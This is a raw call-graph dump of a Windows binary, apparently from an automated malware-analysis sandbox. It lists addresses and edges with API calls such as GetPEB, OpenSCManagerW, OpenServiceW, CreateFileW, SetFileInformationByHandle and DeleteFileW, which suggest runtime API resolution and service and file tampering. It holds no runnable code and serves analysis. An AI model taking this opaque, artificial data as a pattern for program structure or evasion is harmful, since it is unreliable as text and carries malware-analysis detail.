GetPEB 4032->4033 4033->4024 4033->4025 4033->4026 4033->4028 4033->4029 4033->4030 4033->4032 4034 47b9d7 GetPEB 4033->4034 4327 473511 4033->4327 4340 4740d2 4033->4340 4034->4033 4037 4815a4 4035->4037 4036 4809f9 LoadLibraryW RtlAllocateHeap GetPEB 4036->4037 4037->4036 4038 4816a8 4037->4038 4038->3927 4040 4854b9 4039->4040 4041 48587a 4040->4041 4042 485878 4040->4042 4045 48eaa3 2 API calls 4040->4045 4356 474627 4040->4356 4043 474627 GetPEB 4041->4043 4042->3927 4043->4042 4045->4040 4047 47daa9 4046->4047 4048 48bff0 GetPEB 4047->4048 4049 47db4e 4048->4049 4049->3927 4051 474cd5 4050->4051 4052 48bff0 GetPEB 4051->4052 4053 474d6f 4052->4053 4053->3927 4057 48d91e 4054->4057 4058 48da08 4057->4058 4059 474bb4 2 API calls 4057->4059 4060 48734a GetPEB 4057->4060 4061 47b9d7 GetPEB 4057->4061 4368 47ffde 4057->4368 4372 485d68 4057->4372 4058->3927 4059->4057 4060->4057 4061->4057 4068 48afca 4062->4068 4063 48eaa3 2 API calls 4063->4068 4064 48b130 4065 476a8d GetPEB 4064->4065 4067 48b12e 4065->4067 4067->3927 4068->4063 4068->4064 4068->4067 4396 47c5c3 4068->4396 4400 485031 4068->4400 4404 49225a 4068->4404 4072 48e794 4071->4072 4075 48eaa3 2 API calls 4072->4075 4076 48e822 4072->4076 4524 49032a 4072->4524 4528 48aa59 4072->4528 4075->4072 4076->3927 4078 48eaa3 2 API calls 4077->4078 4079 4851d5 4078->4079 4079->3927 4083 48ee36 4080->4083 4082 48ef0f 4082->3927 4083->4082 4085 47ffde GetPEB 4083->4085 4532 47ba25 4083->4532 4535 480c7c 4083->4535 4085->4083 4094 48cd1c 4086->4094 4088 474bb4 RtlAllocateHeap GetPEB 4088->4094 4089 48ade9 GetPEB 4089->4094 4090 481bed GetPEB 4090->4094 4091 48cfb1 4091->3927 4092 4866c2 2 API calls 4092->4094 4094->4088 4094->4089 4094->4090 4094->4091 4094->4092 4096 47b9d7 GetPEB 4094->4096 4573 473f09 4094->4573 4577 491cad 4094->4577 4581 473152 4094->4581 4096->4094 4100 471b3f 4097->4100 4099 47b184 GetPEB 4099->4100 4100->4099 4104 47225e 4100->4104 4106 476a8d GetPEB 4100->4106 4585 47a01c 4100->4585 4602 4927df 4100->4602 4612 4895a8 4100->4612 4629 489184 4100->4629 4638 4847d2 4100->4638 4104->3927 4106->4100 4108 48ec4b 4107->4108 4110 48eaa3 2 API calls 4108->4110 4111 48ec91 4108->4111 4781 4903f2 4108->4781 4110->4108 4111->3927 4113 48dd12 4112->4113 4114 47f2b9 GetPEB 4113->4114 4115 48dd3a 4113->4115 4114->4113 4115->3927 4117 474cb9 GetPEB 4116->4117 4118 48b37d 4117->4118 4118->3927 4120 48bb13 4119->4120 4126 48bf0f 4120->4126 4127 48eaa3 2 API calls 4120->4127 4814 47bb23 4120->4814 4821 49086f 4120->4821 4833 48f24c 4120->4833 4854 472279 4120->4854 4872 47ced8 4120->4872 4880 4913fd 4120->4880 4888 48692b 4120->4888 4126->3927 4127->4120 4131 47588d GetPEB 4130->4131 4132 47313a 4131->4132 5017 48da13 4132->5017 4143 48c3a6 4135->4143 4136 476a8d GetPEB 4136->4143 4139 48c514 4139->3927 4140 48c516 5037 47f9a7 4140->5037 4143->4136 4143->4139 4143->4140 5021 485cb1 4143->5021 5025 480097 4143->5025 5030 47f605 4143->5030 5034 47e2b2 4143->5034 4148 475aa2 4145->4148 4147 475b7d 4147->3927 4148->4147 5041 485c05 4148->5041 5045 47e0eb 4148->5045 4151 47c7eb 4150->4151 4152 47ce91 4151->4152 4153 4866c2 2 API calls 4151->4153 4154 47c453 GetPEB 4151->4154 4156 474bb4 RtlAllocateHeap GetPEB 4151->4156 4157 47ce8f 4151->4157 4158 481bed GetPEB 4151->4158 4159 47b9d7 GetPEB 4151->4159 4155 4863f0 3 API calls 4152->4155 4153->4151 4154->4151 4155->4157 4156->4151 4157->3937 4158->4151 4159->4151 4166 478fba 4160->4166 4161 474bb4 2 API calls 4161->4166 4163 48734a GetPEB 4163->4166 4165 4790e2 4168 47ffde GetPEB 4165->4168 4166->4161 4166->4163 4166->4165 4167 47b9d7 GetPEB 4166->4167 4169 49110e 2 API calls 4166->4169 4170 47b4fc 4 API calls 4166->4170 4171 4790e0 4166->4171 5049 47d899 4166->5049 5056 479133 4166->5056 4167->4166 4172 4790fb 4168->4172 4169->4166 4170->4166 4171->3937 5065 47f6cf 4172->5065 4175 48a9a1 4174->4175 4176 48bff0 GetPEB 4175->4176 4177 48aa46 CloseServiceHandle 4176->4177 4177->3956 4179 4866e9 4178->4179 4180 48bff0 GetPEB 4179->4180 4181 48676b SHGetFolderPathW 4180->4181 4181->3956 4183 4732cd 4182->4183 4184 48bff0 GetPEB 4183->4184 4185 47337c OpenSCManagerW 4184->4185 4185->3956 4191 474fae 4186->4191 4189 479574 GetPEB 4189->4191 4190 475080 4190->3956 4191->4189 4191->4190 4201 48ade9 4191->4201 4205 4907bb 4191->4205 4209 47645e 4192->4209 4196 48eb9a 4196->3956 4198 47958e 4197->4198 4216 479aac 4198->4216 4202 48ae00 4201->4202 4203 48bff0 GetPEB 4202->4203 4204 48aea1 4203->4204 4204->4191 4206 4907d1 4205->4206 4207 48bff0 GetPEB 4206->4207 4208 490861 4207->4208 4208->4191 4210 48bff0 GetPEB 4209->4210 4211 4764fc 4210->4211 4212 481b22 4211->4212 4213 481b41 4212->4213 4214 48bff0 GetPEB 4213->4214 4215 481bdd RtlAllocateHeap 4214->4215 4215->4196 4217 479ace 4216->4217 4218 48bff0 GetPEB 4217->4218 4219 479601 4218->4219 4219->3958 4221 474bce 4220->4221 4222 48eaa3 2 API calls 4221->4222 4223 474c3e 4222->4223 4223->3973 4225 47d6aa 4224->4225 4226 48bff0 GetPEB 4225->4226 4227 47d746 4226->4227 4227->3973 4229 47c728 4228->4229 4230 48bff0 GetPEB 4229->4230 4231 47c7bd 4230->4231 4231->3973 4233 47d5e4 4232->4233 4234 48bff0 GetPEB 4233->4234 4235 47d67d 4234->4235 4235->3968 4237 47b9e9 4236->4237 4238 476a8d GetPEB 4237->4238 4239 47ba1e 4238->4239 4239->3973 4241 476a9d 4240->4241 4242 47645e GetPEB 4241->4242 4243 476bbb 4242->4243 4246 4850b6 4243->4246 4247 4850d5 4246->4247 4248 48bff0 GetPEB 4247->4248 4249 476bd4 4248->4249 4249->3971 4251 47c507 4250->4251 4252 48bff0 GetPEB 4251->4252 4253 47c5b2 OpenServiceW 4252->4253 4253->3979 4255 481089 4254->4255 4256 48bff0 GetPEB 4255->4256 4257 481122 4256->4257 4257->3979 4259 47d35d 4258->4259 4260 474bb4 2 API calls 4259->4260 4261 47d4ea 4260->4261 4286 47fd5f 4261->4286 4264 47b9d7 GetPEB 4265 47d516 4264->4265 4290 479ea8 4265->4290 4267 47d52a 4267->3989 4269 491128 4268->4269 4270 47b184 GetPEB 4269->4270 4271 49135e 4270->4271 4272 47b184 GetPEB 4271->4272 4273 491378 4272->4273 4274 47b184 GetPEB 4273->4274 4275 49138d 4274->4275 4276 4907bb GetPEB 4275->4276 4277 4913a2 4276->4277 4278 4907bb GetPEB 4277->4278 4279 4913ba 4278->4279 4297 47338b 4279->4297 4281 4913f0 4281->3982 4283 48736f 4282->4283 4284 47f56b GetPEB 4283->4284 4285 48738c 4284->4285 4285->3982 4287 47fd7b 4286->4287 4294 47f56b 4287->4294 4291 479ebe 4290->4291 4292 48bff0 GetPEB 4291->4292 4293 479f4d DeleteFileW 4292->4293 4293->4267 4295 48bff0 GetPEB 4294->4295 4296 47d507 4295->4296 4296->4264 4298 47339b 4297->4298 4299 48bff0 GetPEB 4298->4299 4300 473449 SHFileOperationW 4299->4300 4300->4281 4302 48bff0 GetPEB 4301->4302 4303 475939 4302->4303 4303->3993 4305 48bff0 GetPEB 4304->4305 4306 47f361 4305->4306 4306->3993 4308 481c12 4307->4308 4309 47f56b GetPEB 4308->4309 4310 481c34 4309->4310 4310->3993 4312 47f1fa 4311->4312 4313 48bff0 GetPEB 4312->4313 4314 47f2a8 SetFileInformationByHandle 4313->4314 4314->4008 4316 48bf49 4315->4316 4317 48bff0 GetPEB 4316->4317 4318 48bfd6 CreateFileW 4317->4318 4318->4008 4320 48190a 4319->4320 4321 48bff0 GetPEB 4320->4321 4322 481999 4321->4322 4322->4008 4324 48ba53 4323->4324 4325 48bff0 GetPEB 4324->4325 4326 48bae0 4325->4326 4326->4015 4328 473537 4327->4328 4329 473c34 4328->4329 4331 48eaa3 RtlAllocateHeap GetPEB 4328->4331 4332 476a8d GetPEB 4328->4332 4335 473c45 4328->4335 4336 48a98e 2 API calls 4328->4336 4337 47c4eb 2 API calls 4328->4337 4339 47f2b9 GetPEB 4328->4339 4344 48b14e 4328->4344 4348 4813d4 4328->4348 4352 48a3e6 4328->4352 4330 476a8d GetPEB 4329->4330 4330->4335 4331->4328 4332->4328 4335->4033 4336->4328 4337->4328 4339->4328 4341 47411c 4340->4341 4342 48bff0 GetPEB 4341->4342 4343 47419f 4342->4343 4343->4033 4345 48b16a 4344->4345 4346 48bff0 GetPEB 4345->4346 4347 48b205 4346->4347 4347->4328 4349 48140f 4348->4349 4350 48bff0 GetPEB 4349->4350 4351 4814bb 4350->4351 4351->4328 4353 48a415 4352->4353 4354 48bff0 GetPEB 4353->4354 4355 48a4a0 4354->4355 4355->4328 4357 474640 4356->4357 4360 481d1c 4357->4360 4361 481d3a 4360->4361 4364 472fe6 4361->4364 4365 473002 4364->4365 4366 48bff0 GetPEB 4365->4366 4367 4730ae 4366->4367 4367->4040 4369 47fff1 4368->4369 4370 48bff0 GetPEB 4369->4370 4371 48008b 4370->4371 4371->4057 4382 485d94 4372->4382 4373 4863d3 4392 47428c 4373->4392 4375 4863d1 4375->4057 4378 48734a GetPEB 4378->4382 4379 474bb4 RtlAllocateHeap GetPEB 4379->4382 4380 485d68 2 API calls 4380->4382 4381 47fd5f GetPEB 4381->4382 4382->4373 4382->4375 4382->4378 4382->4379 4382->4380 4382->4381 4383 47b9d7 GetPEB 4382->4383 4384 47fa6c 4382->4384 4388 47fe4b 4382->4388 4383->4382 4385 47fa85 4384->4385 4386 48bff0 GetPEB 4385->4386 4387 47fb15 4386->4387 4387->4382 4389 47fe5e 4388->4389 4390 48bff0 GetPEB 4389->4390 4391 47fef3 4390->4391 4391->4382 4393 4742a5 4392->4393 4394 48bff0 GetPEB 4393->4394 4395 474337 4394->4395 4395->4375 4397 47c635 4396->4397 4398 47c61f 4396->4398 4397->4068 4398->4397 4399 476a8d GetPEB 4398->4399 4399->4398 4401 485047 4400->4401 4414 480b4c 4401->4414 4407 49252f 4404->4407 4405 474bb4 2 API calls 4405->4407 4406 4926f3 4409 476a8d GetPEB 4406->4409 4407->4405 4407->4406 4410 48eaa3 2 API calls 4407->4410 4411 492704 4407->4411 4412 47b9d7 GetPEB 4407->4412 4516 48acff 4407->4516 4520 47c453 4407->4520 4409->4411 4410->4407 4411->4068 4412->4407 4415 480b68 4414->4415 4417 480c59 4415->4417 4420 480c57 4415->4420 4421 48eaa3 2 API calls 4415->4421 4423 477786 4415->4423 4440 47508b 4415->4440 4449 473210 4415->4449 4419 476a8d GetPEB 4417->4419 4419->4420 4420->4068 4421->4415 4438 47842c 4423->4438 4424 4788b0 4425 47d5cb GetPEB 4424->4425 4426 4788ae 4425->4426 4426->4415 4430 47f36a GetPEB 4430->4438 4431 474bb4 RtlAllocateHeap GetPEB 4431->4438 4436 481d1c GetPEB 4436->4438 4437 47d68b GetPEB 4437->4438 4438->4424 4438->4426 4438->4430 4438->4431 4438->4436 4438->4437 4439 47b9d7 GetPEB 4438->4439 4454 479f58 4438->4454 4458 47bd30 4438->4458 4462 47b40a 4438->4462 4466 47fd9d 4438->4466 4470 487473 4438->4470 4496 474d7d 4438->4496 4500 48677f 4438->4500 4439->4438 4441 4755c3 4440->4441 4442 47575d 4441->4442 4443 47575b 4441->4443 4445 474bb4 RtlAllocateHeap GetPEB 4441->4445 4446 47b40a GetPEB 4441->4446 4447 47d68b GetPEB 4441->4447 4448 47b9d7 GetPEB 4441->4448 4444 47d5cb GetPEB 4442->4444 4443->4415 4444->4443 4445->4441 4446->4441 4447->4441 4448->4441 4450 48677f GetPEB 4449->4450 4451 47329c 4450->4451 4452 476a8d GetPEB 4451->4452 4453 4732af 4452->4453 4453->4415 4455 479f7a 4454->4455 4456 48bff0 GetPEB 4455->4456 4457 47a009 4456->4457 4457->4438 4459 47bd52 4458->4459 4460 48bff0 GetPEB 4459->4460 4461 47bdf5 4460->4461 4461->4438 4463 47b43a 4462->4463 4464 48bff0 GetPEB 4463->4464 4465 47b4e0 4464->4465 4465->4438 4467 47fdb3 4466->4467 4468 48bff0 GetPEB 4467->4468 4469 47fe3d 4468->4469 4469->4438 4475 488307 4470->4475 4471 47d5cb GetPEB 4471->4475 4472 474bb4 RtlAllocateHeap GetPEB 4478 4886af 4472->4478 4473 488558 4479 474bb4 2 API calls 4473->4479 4474 476a8d GetPEB 4474->4475 4475->4471 4475->4473 4475->4474 4476 4887d6 4475->4476 4477 48eaa3 2 API calls 4475->4477 4475->4478 4483 474bb4 RtlAllocateHeap GetPEB 4475->4483 4484 47b9d7 GetPEB 4475->4484 4504 478ab6 4475->4504 4508 4765d5 4475->4508 4476->4438 4477->4475 4478->4472 4485 47d68b GetPEB 4478->4485 4491 47b9d7 GetPEB 4478->4491 4481 488578 4479->4481 4482 474bb4 2 API calls 4481->4482 4486 48859a 4482->4486 4483->4475 4484->4475 4485->4478 4487 48ade9 GetPEB 4486->4487 4489 4885c6 4487->4489 4512 48cfc3 4489->4512 4491->4478 4493 47b9d7 GetPEB 4494 488697 4493->4494 4495 47b9d7 GetPEB 4494->4495 4495->4478 4497 474dad 4496->4497 4498 48bff0 GetPEB 4497->4498 4499 474e5c 4498->4499 4499->4438 4501 486792 4500->4501 4502 48bff0 GetPEB 4501->4502 4503 486834 4502->4503 4503->4438 4505 478af6 4504->4505 4506 48bff0 GetPEB 4505->4506 4507 478baa 4506->4507 4507->4475 4509 476602 4508->4509 4510 48bff0 GetPEB 4509->4510 4511 476697 4510->4511 4511->4475 4513 48cff4 4512->4513 4514 48bff0 GetPEB 4513->4514 4515 488667 4514->4515 4515->4493 4517 48ad1f 4516->4517 4518 48eaa3 2 API calls 4517->4518 4519 48ad9c 4518->4519 4519->4407 4519->4519 4521 47c481 4520->4521 4522 47f56b GetPEB 4521->4522 4523 47c4a8 4522->4523 4523->4407 4525 490343 4524->4525 4526 48bff0 GetPEB 4525->4526 4527 4903e4 4526->4527 4527->4072 4529 48aa83 4528->4529 4530 48bff0 GetPEB 4529->4530 4531 48ab22 4530->4531 4531->4072 4543 483cdd 4532->4543 4536 480c9d 4535->4536 4566 47f43b 4536->4566 4539 480e00 4539->4083 4542 48e373 2 API calls 4542->4539 4544 483d02 4543->4544 4548 483f17 4544->4548 4550 47ba93 4544->4550 4552 475942 4544->4552 4555 481a72 4544->4555 4559 48efa0 4544->4559 4563 47b34c 4544->4563 4551 48e373 2 API calls 4548->4551 4550->4083 4551->4550 4553 47588d GetPEB 4552->4553 4554 47597a 4553->4554 4554->4544 4556 481a88 4555->4556 4557 48bff0 GetPEB 4556->4557 4558 481b14 4557->4558 4558->4544 4560 48efb9 4559->4560 4561 48bff0 GetPEB 4560->4561 4562 48f052 4561->4562 4562->4544 4564 48bff0 GetPEB 4563->4564 4565 47b3f2 4564->4565 4565->4544 4567 48bff0 GetPEB 4566->4567 4568 47f4f2 4567->4568 4568->4539 4569 4814da 4568->4569 4570 4814f9 4569->4570 4571 48bff0 GetPEB 4570->4571 4572 480dee 4571->4572 4572->4542 4574 473f42 4573->4574 4575 48bff0 GetPEB 4574->4575 4576 473ff1 4575->4576 4576->4094 4578 491cd8 4577->4578 4579 48bff0 GetPEB 4578->4579 4580 491d53 4579->4580 4580->4094 4582 473169 4581->4582 4583 48bff0 GetPEB 4582->4583 4584 473203 4583->4584 4584->4094 4600 47a07f 4585->4600 4586 485b4c GetPEB 4586->4600 4588 47b074 4682 485b4c 4588->4682 4589 474bb4 2 API calls 4589->4600 4592 47b08a 4592->4100 4597 476a8d GetPEB 4597->4600 4598 47b9d7 GetPEB 4598->4600 4600->4586 4600->4588 4600->4589 4600->4592 4600->4597 4600->4598 4601 48e29a GetPEB 4600->4601 4650 4841cf 4600->4650 4659 475797 4600->4659 4663 475b8a 4600->4663 4666 476505 4600->4666 4670 47400f 4600->4670 4674 48aeae 4600->4674 4678 48b215 4600->4678 4601->4600 4610 492a55 4602->4610 4604 492bb0 4606 476a8d GetPEB 4604->4606 4605 48eaa3 2 API calls 4605->4610 4607 492bae 4606->4607 4607->4100 4608 474bb4 2 API calls 4608->4610 4609 47f56b GetPEB 4609->4610 4610->4604 4610->4605 4610->4607 4610->4608 4610->4609 4611 47b9d7 GetPEB 4610->4611 4694 4851e8 4610->4694 4611->4610 4613 489fc8 4612->4613 4614 48a353 4613->4614 4615 476a8d GetPEB 4613->4615 4617 481d1c GetPEB 4613->4617 4620 48eaa3 RtlAllocateHeap GetPEB 4613->4620 4622 474bb4 2 API calls 4613->4622 4626 47f56b GetPEB 4613->4626 4627 48a34e 4613->4627 4628 47b9d7 GetPEB 4613->4628 4705 48e18b 4613->4705 4709 489556 4613->4709 4616 48e18b 2 API calls 4614->4616 4615->4613 4618 48a379 4616->4618 4617->4613 4713 47c4b0 4618->4713 4620->4613 4622->4613 4625 47b9d7 GetPEB 4625->4627 4626->4613 4627->4100 4628->4613 4630 4891ae 4629->4630 4631 489537 4630->4631 4634 489535 4630->4634 4636 48eaa3 2 API calls 4630->4636 4637 481d1c GetPEB 4630->4637 4717 4816ad 4630->4717 4723 479617 4630->4723 4633 476a8d GetPEB 4631->4633 4633->4634 4634->4100 4636->4630 4637->4630 4644 4847fd 4638->4644 4639 48500a 4643 476a8d GetPEB 4639->4643 4647 48501e 4643->4647 4644->4639 4645 476a8d GetPEB 4644->4645 4646 47e379 2 API calls 4644->4646 4644->4647 4648 481d1c GetPEB 4644->4648 4649 48eaa3 2 API calls 4644->4649 4765 474342 4644->4765 4770 48a4b5 4644->4770 4777 478bcb 4644->4777 4645->4644 4646->4644 4647->4100 4648->4644 4649->4644 4651 484420 4650->4651 4652 48eaa3 RtlAllocateHeap GetPEB 4651->4652 4655 484518 4651->4655 4657 481d1c GetPEB 4651->4657 4658 476a8d GetPEB 4651->4658 4686 477209 4651->4686 4652->4651 4654 476a8d GetPEB 4656 484520 4654->4656 4655->4654 4655->4656 4656->4600 4657->4651 4658->4651 4660 4757d2 4659->4660 4661 48bff0 GetPEB 4660->4661 4662 475872 4661->4662 4662->4600 4690 491933 4663->4690 4667 47652a 4666->4667 4668 48bff0 GetPEB 4667->4668 4669 4765c3 4668->4669 4669->4600 4671 474036 4670->4671 4672 48bff0 GetPEB 4671->4672 4673 4740bd 4672->4673 4673->4600 4675 48aedf 4674->4675 4676 48bff0 GetPEB 4675->4676 4677 48af74 4676->4677 4677->4600 4679 48b237 4678->4679 4680 48bff0 GetPEB 4679->4680 4681 48b2e9 4680->4681 4681->4600 4683 485b62 4682->4683 4684 48bff0 GetPEB 4683->4684 4685 485bfa 4684->4685 4685->4592 4687 47722b 4686->4687 4688 48bff0 GetPEB 4687->4688 4689 4772b9 4688->4689 4689->4651 4691 491957 4690->4691 4692 48bff0 GetPEB 4691->4692 4693 475c87 4692->4693 4693->4600 4695 4851fe 4694->4695 4696 48545d 4695->4696 4698 48545b 4695->4698 4700 48eaa3 2 API calls 4695->4700 4701 47c63a 4695->4701 4697 47c63a GetPEB 4696->4697 4697->4698 4698->4610 4700->4695 4702 47c662 4701->4702 4703 48bff0 GetPEB 4702->4703 4704 47c6f0 4703->4704 4704->4695 4706 48e1a5 4705->4706 4707 48eaa3 2 API calls 4706->4707 4708 48e230 4707->4708 4708->4613 4710 48957e 4709->4710 4711 47f56b GetPEB 4710->4711 4712 4895a0 4711->4712 4712->4613 4714 47c4c9 4713->4714 4715 47f56b GetPEB 4714->4715 4716 47c4e3 4715->4716 4716->4625 4719 4816c7 4717->4719 4718 4818a9 4745 48595c 4718->4745 4719->4718 4720 4818a7 4719->4720 4730 47e379 4719->4730 4720->4630 4726 479644 4723->4726 4724 48eaa3 2 API calls 4724->4726 4725 4812ef GetPEB 4725->4726 4726->4724 4726->4725 4727 479985 4726->4727 4728 479996 4726->4728 4729 476a8d GetPEB 4727->4729 4728->4630 4729->4728 4742 47e3b8 4730->4742 4731 47f19d 4733 47d5cb GetPEB 4731->4733 4732 474bb4 RtlAllocateHeap GetPEB 4732->4742 4735 47f19b 4733->4735 4734 48eaa3 2 API calls 4734->4742 4735->4719 4737 4765d5 GetPEB 4737->4742 4739 476a8d GetPEB 4739->4742 4742->4731 4742->4732 4742->4734 4742->4735 4742->4737 4742->4739 4743 47d68b GetPEB 4742->4743 4744 47b9d7 GetPEB 4742->4744 4749 4741c6 4742->4749 4753 47b8f4 4742->4753 4757 47fb23 4742->4757 4761 48ac2c 4742->4761 4743->4742 4744->4742 4746 485988 4745->4746 4747 48bff0 GetPEB 4746->4747 4748 485a2b 4747->4748 4748->4720 4750 4741eb 4749->4750 4751 48bff0 GetPEB 4750->4751 4752 474279 4751->4752 4752->4742 4754 47b919 4753->4754 4755 48bff0 GetPEB 4754->4755 4756 47b9c4 4755->4756 4756->4742 4758 47fb3c 4757->4758 4759 48bff0 GetPEB 4758->4759 4760 47fbed 4759->4760 4760->4742 4762 48ac56 4761->4762 4763 48bff0 GetPEB 4762->4763 4764 48ace2 4763->4764 4764->4742 4768 474361 4765->4768 4766 474627 GetPEB 4766->4768 4767 4745f4 4767->4644 4768->4766 4768->4767 4769 48eaa3 2 API calls 4768->4769 4769->4768 4772 48a4e1 4770->4772 4771 48e436 GetPEB 4771->4772 4772->4771 4773 48a861 4772->4773 4774 48eaa3 2 API calls 4772->4774 4776 48a872 4772->4776 4775 476a8d GetPEB 4773->4775 4774->4772 4775->4776 4776->4644 4778 478bde 4777->4778 4779 481d1c GetPEB 4778->4779 4780 478c72 4779->4780 4780->4644 4782 49041a 4781->4782 4784 490738 4782->4784 4785 4906d7 4782->4785 4802 476bfa 4782->4802 4784->4108 4786 48e18b 2 API calls 4785->4786 4787 4906f1 4786->4787 4793 48112d 4787->4793 4792 47b9d7 GetPEB 4792->4784 4806 474b09 4793->4806 4797 4812e4 4798 48ef56 4797->4798 4799 48ef7b 4798->4799 4800 47f56b GetPEB 4799->4800 4801 48ef98 4800->4801 4801->4792 4803 476c16 4802->4803 4804 48bff0 GetPEB 4803->4804 4805 476cad 4804->4805 4805->4782 4807 474b23 4806->4807 4808 48bff0 GetPEB 4807->4808 4809 474ba7 4808->4809 4809->4797 4810 48683f 4809->4810 4811 486871 4810->4811 4812 48bff0 GetPEB 4811->4812 4813 486911 4812->4813 4813->4797 4815 47bcba 4814->4815 4816 47bd24 4815->4816 4817 476a8d GetPEB 4815->4817 4818 474cb9 GetPEB 4815->4818 4820 48e373 2 API calls 4815->4820 4908 480f7a 4815->4908 4816->4120 4817->4815 4818->4815 4820->4815 4830 490d01 4821->4830 4822 490d19 4916 4863f0 4822->4916 4823 479574 GetPEB 4823->4830 4825 490d42 4825->4120 4826 47ffde GetPEB 4826->4830 4828 474bb4 2 API calls 4828->4830 4829 48734a GetPEB 4829->4830 4830->4822 4830->4823 4830->4825 4830->4826 4830->4828 4830->4829 4831 47b9d7 GetPEB 4830->4831 4926 47b200 4830->4926 4930 479b80 4830->4930 4831->4830 4941 48e034 4833->4941 4835 4863f0 3 API calls 4852 48fedc 4835->4852 4836 4866c2 2 API calls 4836->4852 4837 48ade9 GetPEB 4837->4852 4838 4851e8 2 API calls 4838->4852 4839 474bb4 RtlAllocateHeap GetPEB 4839->4852 4840 4902ff 4843 48e373 2 API calls 4840->4843 4842 4902fd 4842->4120 4843->4842 4845 479574 GetPEB 4845->4852 4846 481bed GetPEB 4846->4852 4847 476a8d GetPEB 4847->4852 4848 47ffde GetPEB 4848->4852 4849 47b200 GetPEB 4849->4852 4850 48734a GetPEB 4850->4852 4851 47b9d7 GetPEB 4851->4852 4852->4835 4852->4836 4852->4837 4852->4838 4852->4839 4852->4840 4852->4842 4852->4845 4852->4846 4852->4847 4852->4848 4852->4849 4852->4850 4852->4851 4853 479b80 3 API calls 4852->4853 4944 47f784 4852->4944 4950 47d7a6 4852->4950 4853->4852 4870 472bc8 4854->4870 4855 4863f0 3 API calls 4855->4870 4858 479574 GetPEB 4858->4870 4859 48e373 GetPEB CloseHandle 4859->4870 4860 4730be GetPEB 4860->4870 4862 47ffde GetPEB 4862->4870 4863 472c16 4864 48e373 2 API calls 4863->4864 4866 472c31 4864->4866 4865 47b200 GetPEB 4865->4870 4866->4120 4867 474bb4 2 API calls 4867->4870 4868 48734a GetPEB 4868->4870 4869 47b9d7 GetPEB 4869->4870 4870->4855 4870->4858 4870->4859 4870->4860 4870->4862 4870->4863 4870->4865 4870->4866 4870->4867 4870->4868 4870->4869 4871 479b80 3 API calls 4870->4871 4954 490e6d 4870->4954 4962 47fbf8 4870->4962 4965 47db59 4870->4965 4871->4870 4878 47d206 4872->4878 4873 48aa59 GetPEB 4873->4878 4874 47d24f 4874->4120 4875 47d23b 4877 480f7a GetPEB 4875->4877 4877->4874 4878->4873 4878->4874 4878->4875 4996 473c51 4878->4996 5004 480e0b 4878->5004 4886 491738 4880->4886 4881 48aa59 GetPEB 4881->4886 4882 491781 4882->4120 4883 49176d 4885 480f7a GetPEB 4883->4885 4884 473c51 GetPEB 4884->4886 4885->4882 4886->4881 4886->4882 4886->4883 4886->4884 4887 480e0b GetPEB 4886->4887 4887->4886 4897 48710c 4888->4897 4889 479574 GetPEB 4889->4897 4890 487128 4891 4866c2 2 API calls 4890->4891 4893 48715b 4891->4893 4892 47ffde GetPEB 4892->4897 4894 474bb4 2 API calls 4893->4894 4896 48717e 4894->4896 4895 47b200 GetPEB 4895->4897 4898 48734a GetPEB 4896->4898 4897->4889 4897->4890 4897->4892 4897->4895 4899 474bb4 2 API calls 4897->4899 4902 48734a GetPEB 4897->4902 4905 47b9d7 GetPEB 4897->4905 4906 487210 4897->4906 4907 479b80 3 API calls 4897->4907 4900 4871be 4898->4900 4899->4897 4901 47b9d7 GetPEB 4900->4901 4903 4871d6 4901->4903 4902->4897 4904 4863f0 3 API calls 4903->4904 4904->4906 4905->4897 4906->4120 4907->4897 4909 480f8d 4908->4909 4912 491bd6 4909->4912 4913 491bf5 4912->4913 4914 48bff0 GetPEB 4913->4914 4915 481069 4914->4915 4915->4815 4917 48641e 4916->4917 4918 47b184 GetPEB 4917->4918 4919 48663b 4918->4919 4920 4846e0 2 API calls 4919->4920 4921 486676 4920->4921 4922 48e373 2 API calls 4921->4922 4925 486683 4921->4925 4923 4866a3 4922->4923 4924 48e373 2 API calls 4923->4924 4924->4925 4925->4825 4927 47b219 4926->4927 4928 47f2b9 GetPEB 4927->4928 4929 47b2e7 4928->4929 4929->4830 4932 479b9f 4930->4932 4933 479e5e 4932->4933 4934 48bf1c 2 API calls 4932->4934 4936 479e5c 4932->4936 4937 48454e 4932->4937 4935 48e373 2 API calls 4933->4935 4934->4932 4935->4936 4936->4830 4938 484575 4937->4938 4939 48bff0 GetPEB 4938->4939 4940 484615 4939->4940 4940->4932 4942 48bff0 GetPEB 4941->4942 4943 48e0c1 4942->4943 4943->4852 4947 47f7a0 4944->4947 4945 47f985 4948 474627 GetPEB 4945->4948 4946 47f983 4946->4852 4947->4945 4947->4946 4949 48eaa3 2 API calls 4947->4949 4948->4946 4949->4947 4951 47d7d6 4950->4951 4952 48bff0 GetPEB 4951->4952 4953 47d87c 4952->4953 4953->4852 4957 490e92 4954->4957 4956 47fbf8 GetPEB 4956->4957 4957->4956 4959 491061 4957->4959 4961 491076 4957->4961 4976 48d0a1 4957->4976 4980 472f1a 4957->4980 4960 48e373 2 API calls 4959->4960 4960->4961 4961->4870 4963 48bff0 GetPEB 4962->4963 4964 47fcac 4963->4964 4964->4870 4966 47db99 4965->4966 4968 47b184 GetPEB 4966->4968 4969 47df48 4966->4969 4971 47e07b 4966->4971 4972 474bb4 2 API calls 4966->4972 4975 47b9d7 GetPEB 4966->4975 4988 485a47 4966->4988 4992 48e8e7 4966->4992 4968->4966 4984 491d6d 4969->4984 4971->4971 4972->4966 4975->4966 4977 48d0bd 4976->4977 4978 48bff0 GetPEB 4977->4978 4979 48d13e 4978->4979 4979->4957 4981 472f3e 4980->4981 4982 48bff0 GetPEB 4981->4982 4983 472fcc 4982->4983 4983->4957 4985 491d80 4984->4985 4986 48bff0 GetPEB 4985->4986 4987 47df59 4986->4987 4987->4870 4989 485a82 4988->4989 4990 48bff0 GetPEB 4989->4990 4991 485b29 4990->4991 4991->4966 4993 48e902 4992->4993 4994 48bff0 GetPEB 4993->4994 4995 48e994 4994->4995 4995->4966 4997 473c6f 4996->4997 4998 473eff 4997->4998 5009 483ff6 4997->5009 4998->4878 5001 481d1c GetPEB 5003 473eb6 5001->5003 5002 481d1c GetPEB 5002->5003 5003->4998 5003->5002 5007 480e27 5004->5007 5005 480f48 5005->4878 5006 48e9a4 GetPEB 5006->5007 5007->5005 5007->5006 5013 473455 5007->5013 5010 484017 5009->5010 5011 48bff0 GetPEB 5010->5011 5012 473e94 5011->5012 5012->4998 5012->5001 5014 473468 5013->5014 5015 48bff0 GetPEB 5014->5015 5016 473502 5015->5016 5016->5007 5018 48da29 5017->5018 5019 48bff0 GetPEB 5018->5019 5020 473149 5019->5020 5020->3927 5022 485cca 5021->5022 5023 48bff0 GetPEB 5022->5023 5024 485d5a 5023->5024 